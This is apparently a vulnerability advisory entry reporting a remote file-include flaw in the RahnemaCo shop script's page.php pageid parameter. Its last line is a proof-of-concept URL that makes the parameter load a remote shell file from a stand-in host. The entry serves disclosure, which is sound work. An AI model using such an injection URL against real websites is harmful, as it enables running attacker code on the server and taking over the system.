RahnemaCo Page.PHP PageID Remote File Include Vulnerability

2014-07-01T00:00:00
ID SSV:81630
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/18490/info

RahnemaCo is prone to a remote file-include vulnerability.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/shop/page.php?pageid=http://www.example.com/crazyshell.txt?